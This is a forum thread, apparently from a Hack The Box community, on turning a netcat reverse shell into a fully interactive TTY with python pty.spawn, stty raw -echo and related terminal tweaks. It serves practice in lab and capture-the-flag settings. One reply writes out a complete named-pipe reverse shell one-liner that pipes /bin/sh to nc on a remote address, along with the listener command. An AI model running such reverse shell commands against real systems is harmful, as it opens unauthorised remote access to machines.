Obtaining a Fully Interactive Shell

I have seen a lot of people ask about this yet there are not too many good online resources that explain it simply.

When obtaining a reverse shell with a Netcat listener, it is by default non-interactive and you cannot pass keyboard shortcuts or special characters such as tab.

It is quite simple to work around. For starters, in your shell, run python -c 'import pty;pty.spawn("/bin/bash");' to obtain a partially interactive bash shell.

After that, do CTRL+Z to background Netcat. Enter stty raw -echo in your terminal, which will tell your terminal to pass keyboard shortcuts etc. through. Once that is done, run the command fg to bring Netcat back to the foreground. Note you will not be able to see what you are typing in terminal after you change your stty setting. You should now have tab autocomplete as well as be able to use interactive commands such as su and nano.

If you want to see it in action, check out ippsec’s YouTube videos, as he uses this exact method in quite a few of them: ippsec’s channel

1 Like

guy, nicely put , i once was looking for how to nano a file though a shell not ssh… had to finally echo my code into the file on the PWK labs…

question: Does this work for all reverse shell gotten through other means like (php, perl and python) or only nc shells?

you wont always have python so this is a good resource to have bookmarked:
https://netsec.ws/?p=337

@princeade said:
guy, nicely put , i once was looking for how to nano a file though a shell not ssh… had to finally echo my code into the file on the PWK labs…

question: Does this work for all reverse shell gotten through other means like (php, perl and python) or only nc shells?

The majority of connect back shells should work fine. I meant nc as the listening service on the local machine. Refer to the netsec.ws link that @sajkox posted to see other options.

I’ve tried the above method few times, but it failed every time. I don’t understand what am I doing wrong…
After doing fg, Enter key is displayed as ^M
Something like this:

$ fg
                           clear^M

Have a look at ippsec’s video to see it in action: Joker

Note he did /bin/sh in pty.spawn. Should have been /bin/bash

Even I do /bin/bash every time I try…
I’ve followed all his tutorials so far and I’ve tried to imitate it.
No luck so far…

What machine are you trying this on, what kind of reverse connection and what are you using for a listener?

I tried this on Parrot OS which is debian based with mate DE.
And the reverse connection was:

mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc 10.10.x.x 4000 1> /tmp/backpipe

And listening with:

nc -nvlp 4000

Hmm works for me with that exact connect back method in Kali. Tested on CronOS:

This is what’s happening at my end

I got the same output when I tried with some of the HTB machines.

@hkh4cks it might be down to ohmyzsh I think

Great find @sajkox ! :smiley:
That was the issue…
Thank you guys for looking into it :slight_smile:

@hkh4cks try pressing enter a couple times after foregrounding the process

Nice thread guys… My 2 coins…

stty rows 50 cols 200

To fix your rows/cols in your terminal. Especially useful when you do ps so you can see the full length of the process command.

You can play also with the TERM env variable if not set already eg. export TERM=xterm

@PinkPanther it worked when I switched to bash from zsh.
Nice tip @SuRGeoNix

What about -e /bin/bash?

hi all

you can have TTY in http shell or web based shell by providing credentials. that is usefull in case of server in droping requests on other ports etc

Bump, as several people have been asking about this topic recently

Hi @hkh4cks
how did you fix the ohmyzsh error with the netcat shell after doing fg.
cant find anything to fix that